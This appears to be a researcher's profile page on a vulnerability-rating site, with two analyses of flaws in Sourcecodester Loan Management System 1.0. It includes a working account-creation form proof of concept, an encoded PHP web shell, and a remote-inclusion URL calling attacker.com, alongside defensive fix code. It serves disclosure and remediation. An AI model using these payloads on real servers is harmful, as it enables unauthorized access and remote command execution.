Zeyad-Azima (6)

Last Login: February 24, 2023
Assessments: 2
Score: 6

Zeyad-Azima's Latest (2) Contributions

Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Technical Analysis

An Incorrect Access Control vulnerability exists in Sourcecodester Loan
Management System 1.0 in the ajax.php endpoint.

  • If we take a look at the source code of the ajax.php file, which is responsible for actions (add, delete, modify users and more),
  • we can see that there is no code that checks for a session or otherwise authenticates the user.

The attacker can send POST requests to add users without any permissions or requirements, and without authentication, simply by sending the following request or using the following HTML code:

 <html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="http://target.com/ajax.php?action=save_user" method="POST">
       <input type="hidden" name="id" value="" />
       <input type="hidden" name="name" value="CVE" />
       <input type="hidden" name="username" value="cve" />
       <input type="hidden" name="password" value="cve@password" />
       <input type="hidden" name="type" value="1" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
 </html>
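The following is an added example, not the application's own code: a toy reconstruction of the pattern described above (an ajax.php that dispatches on ?action= and calls the handler without ever consulting the session) next to a hardened dispatcher that refuses before any handler runs. The function names, the session keys (login_id, login_type, csrf), the table layout and the assumption that type 1 means administrator are all assumptions made for the example.

```php
<?php
// Added example, not the application's own code. Everything here (the PDO
// handle, the session key names, the admin "type" value, the table columns)
// is assumed for illustration.

session_start();

// --- Vulnerable shape: the request is dispatched on ?action=... alone. ---
// Any unauthenticated client can POST id/name/username/password/type and
// create an account, which is exactly what the HTML form above does.
function dispatch_unauthenticated(PDO $db, string $action, array $post): string
{
    switch ($action) {
        case 'save_user':
            return save_user($db, $post);
        case 'delete_user':
            return delete_user($db, (int)($post['id'] ?? 0));
        default:
            return 'unknown action';
    }
}

// --- Hardened shape: refuse before touching any action handler. ---
function dispatch_authenticated(PDO $db, string $action, array $post): string
{
    // 1. A logged-in session is required for every action in this file.
    if (empty($_SESSION['login_id'])) {
        http_response_code(401);
        return 'unauthorized';
    }
    // 2. User administration is restricted to administrator accounts
    //    (assumed: type 1 = administrator).
    $adminOnly = ['save_user', 'delete_user'];
    if (in_array($action, $adminOnly, true) && (int)($_SESSION['login_type'] ?? 0) !== 1) {
        http_response_code(403);
        return 'forbidden';
    }
    // 3. A per-session CSRF token stops the cross-site form above from
    //    riding an administrator's live session. hash_equals() compares in
    //    constant time; a missing token fails closed.
    if (!hash_equals((string)($_SESSION['csrf'] ?? ''), (string)($post['csrf'] ?? ''))) {
        http_response_code(400);
        return 'bad csrf token';
    }
    return dispatch_unauthenticated($db, $action, $post);
}

function save_user(PDO $db, array $post): string
{
    $stmt = $db->prepare(
        'INSERT INTO users (name, username, password, type) VALUES (?, ?, ?, ?)'
    );
    $stmt->execute([
        $post['name'] ?? '',
        $post['username'] ?? '',
        password_hash($post['password'] ?? '', PASSWORD_DEFAULT),
        (int)($post['type'] ?? 0),
    ]);
    return 'saved';
}

function delete_user(PDO $db, int $id): string
{
    $db->prepare('DELETE FROM users WHERE id = ?')->execute([$id]);
    return 'deleted';
}

// Usage (assumed: $db is the application's PDO connection):
// echo dispatch_authenticated($db, $_GET['action'] ?? '', $_POST);
```

A quick check for the vulnerable shape is to send the save_user POST from the form above with no session cookie at all: a correctly guarded endpoint answers with a 401 or a redirect to the login page, while the affected version answers as if an administrator had submitted it.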
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis
  • A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Loan Management System 1.0 via the page parameter to index.php.
    The bug affects the [index.php] file through the [page] parameter, because the value is passed to [include] unsafely and can point at a remote file.

  • If we take a look at the index.php file we can see the following code:

<?php $page = isset($_GET['page']) ? $_GET['page'] :'home'; ?>
<?php include $page.'.php' ?>

The index file reads a parameter named page, whose default value is home. It appends .php to that value and includes the resulting file.

The attacker logs in to the panel, creates a PHP file containing malicious PHP code on a remote server, and then passes the URL of that file to the target through the [page] parameter. The target executes the code, which lets the attacker carry out malicious actions (delete, create, modify, etc.) on the target server; in other words, the attacker achieves RCE (remote code execution).

Note: For the server to execute your malicious code, the file must look like this:

 <?php
 echo base64_decode("PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+CgpDTUQgPGlucHV0IG5hbWU9ImNtZCIgdHlwZT0idGV4dCI+Cgo8YnI+CjxpbnB1dCBuYW1lPSJzdWIiIHR5cGU9InN1Ym1pdCI+CjwvZm9ybT4KPD9waHAKZWNobyAiPHByZT4iOwpzeXN0ZW0oQCRfUE9TVFsiY21kIl0pOwplY2hvICI8L3ByZT4iOwo/Pg==");
 ?>

E.g.: http://target.com/index.php?page=http://attacker.com/exploit
Note: Don't add [.php] to your attacker URL, because the script automatically appends .php to the [page] parameter value.
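The following is an added example, not the application's own code. It puts the include pattern quoted above next to one hardened replacement, an allowlist of page names, so that no user-controlled string ever reaches include. The page names in the allowlist are assumed; the application's real page list is not shown here. Note that the remote variant (page=http://...) only works when PHP's allow_url_include setting is on; with it off, the same line still includes attacker-chosen local files, which is why the fix must be an allowlist rather than a reliance on php.ini.

```php
<?php
// Added example, not the application's own code. The allowlist entries are
// assumed; substitute the pages that actually exist in the application.

// Vulnerable shape, as in index.php: whatever arrives in ?page= is
// concatenated with '.php' and handed to include. With allow_url_include
// on, page=http://attacker.com/exploit fetches and runs remote code; with it
// off, page=../../some/local/file still includes an attacker-chosen local file.
function include_page_unsafe(string $page): void
{
    include $page . '.php';
}

// Hardened shape: map the parameter onto a fixed allowlist and fall back to
// the default for anything else. Attacker input never becomes a path.
const ALLOWED_PAGES = ['home', 'users', 'borrowers', 'loans', 'payments']; // assumed names

function resolve_page(?string $page): string
{
    $page = $page ?? 'home';
    if (!in_array($page, ALLOWED_PAGES, true)) {
        // Fall back to a safe default rather than echoing attacker input.
        $page = 'home';
    }
    // __DIR__ anchors the include to the application directory; basename()
    // is a second line of defence if the allowlist is ever loosened.
    return __DIR__ . '/' . basename($page) . '.php';
}

function include_page_safe(?string $page): void
{
    include resolve_page($page);
}

// Usage in index.php (assumed):
// include_page_safe($_GET['page'] ?? null);
//
// resolve_page('http://attacker.com/exploit')  -> __DIR__ . '/home.php'
// resolve_page('../../etc/passwd')             -> __DIR__ . '/home.php'
// resolve_page('users')                        -> __DIR__ . '/users.php'
```

The strict comparison in in_array() matters: a loose comparison would let unusual inputs such as "0" match unexpectedly in older PHP versions, and the allowlist is the only control standing between the request and include.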